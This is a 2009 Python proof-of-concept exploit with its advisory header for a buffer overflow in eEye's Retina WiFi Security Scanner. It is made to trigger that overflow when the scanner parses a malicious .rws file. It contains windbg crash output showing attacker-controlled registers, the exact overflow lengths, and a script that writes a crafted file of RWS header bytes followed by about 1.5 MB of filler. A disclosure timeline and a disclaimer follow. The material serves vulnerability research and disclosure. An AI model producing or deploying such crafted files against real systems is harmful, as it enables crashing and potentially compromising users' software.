#!/usr/bin/python # # # * Title: Retina WiFi Security Scanner 1.0 (.rws parsing) Buffer Overflow Vulnerability # # # * Summary: Retina WiFi Scanner is a tool to be used to detect IEEE 802.11 (WiFi) based devices. # * Vendor: eEye Digital Security Inc. # * Product Web Page: http://www.eeye.com/ # * Current Version: 1.0.8.68 # * Notiz: The tool is implemented as part of the eEye's Retina Network Security Scanner package. # * Tested On Microsoft Windows XP Professional SP3 (English) # # * Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic # * liquidworm gmail com # * http://www.zeroscience.org # * 16.05.2009 # # * Original Advisory: http://www.zeroscience.org/codes/retinawifi_bof.txt # * eEye Advisory: http://research.eeye.com/html/advisories/published/AD20090710.html # # # * --------------------------------windbg---------------------------------- * # # (1268.dd8): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=41414141 ebx=00000003 ecx=000006d8 edx=00000000 esi=0000006c edi=10264da0 # eip=1001dcce esp=0012e72c ebp=0012e754 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 # *** Defaulted to export symbols for [path]\WiFiCore.dll - # WiFiCore!LibWifi_ReportHTML+0x1b48e: # 1001dcce f644300401 test byte ptr [eax+esi+4],1 ds:0023:414141b1=?? # 0:000> g # (1268.dd8): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000010 ebx=41414141 ecx=00000000 edx=41414141 esi=00001000 edi=41414150 # eip=7c809eda esp=00121484 ebp=001214b0 iopl=0 nv up ei pl zr na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 # *** Defaulted to export symbols for [path]\kernel32.dll - # kernel32!IsBadReadPtr+0x39: # 7c809eda 8a02 mov al,byte ptr [edx] ds:0023:41414141=?? # # * -------------------------------/windbg---------------------------------- * # # # * Disclosure Timeline: # # * [16.05.2009] Vulnerability discovered. # * [16.05.2009] Initial contact with the vendor with description included + screenshot + proof # of concept code. # * [18.05.2009] Vendor contacted again for confirmation of the vulnerability because of no reply # from previous e-mail. # * [18.05.2009] Vendor replied and acknowledged the vulnerability. Patch development process in # progress. # * [25.05.2009] Vendor contacted for information on patch development and its release process # because of our advisory disclosure policy. # * [29.05.2009] Vendor contacted again for information on patch development because of no reply # from previous e-mail. # * [29.05.2009] Vendor answered. Bug fixes scheduled within next week. # * [08.06.2009] Vendor contacted for an accurate date of a patch release or scheduled bug fix # time line information. # * [08.06.2009] Vendor replied and confirmed that the vulnerability has been mitigated and passed # the QA. The fix will be introduced in the next release of the product. Scheduled # date for the release of the update is not yet known...or...it's unknown :). # * [12.06.2009] Vendor informs that the fix will be released along with the new scheduled release # of the Retina package approximately on 29th of June. # * [29.06.2009] Contacted the vendor, asked for a more accurate (fixed) date of the release. # * [29.06.2009] Vendor says that the patch is being tested by the QA team along with other program # * fixes. Vendor will contact me after the tests, with the results from the same. # * [06.07.2009] Sent an e-mail to the vendor stating that the advisory is planned to be published # * on 10th of july because of internal company reasons. # * [10.07.2009] Vendor releases patch: http://download.eeye.com/html/products/retinawireless/ # * [10.07.2009] Public advisory released. # # # # * Pozdrav Do: # # * sm, thricer, drowsy, Jayji, Leon Juranic, # * teppei, n3tpr0b3, DrunkY, apo, Aodrulez, # * kokanin, e.wiZz!, j0rgan, str0ke, Uploader, # * Jonathan Salwan, Sergio 'shadown' Alvarez, # * Malformation, dz0, d3, Greg Linares, lio, # * mio, drown, dni, Damjan, Maximiliano Soler, # * leetgeek, Preddy, Gliser, eSDee i t.d. :) # # # * Proof Of Concept: # #=========================================*snip*=========================================# header = ( "\x52\x57\x53" "\x30\x31\x30" "\x19\x52\x76" "\x00" ) buffer = "\x41" * 1574624 #[Bytes/chars] #1574622 No issues #1574623 BoF, Access violation when reading [random] #1574624 BoF, Access violation when reading [414141B1] #... payload = header + buffer file = "Abulia.rws" filetzio=open(file,'w') filetzio.write(payload) filetzio.close() print "\n[+] File " + file + " successfully landed.\n" #=========================================*snip*=========================================# ################################################################################# # # # * Disclaimer: # # # # * This document and all the information it contains are provided "as is", # # * for educational purposes only, without warranty of any kind, whether # # * express or implied. # # # # * The author reserves the right not to be responsible for the topicality, # # * correctness, completeness or quality of the information provided in # # * this document. Liability claims regarding damage caused by the use of # # * any information provided, including any kind of information which is # # * incomplete or incorrect, will therefore be rejected. # # # #################################################################################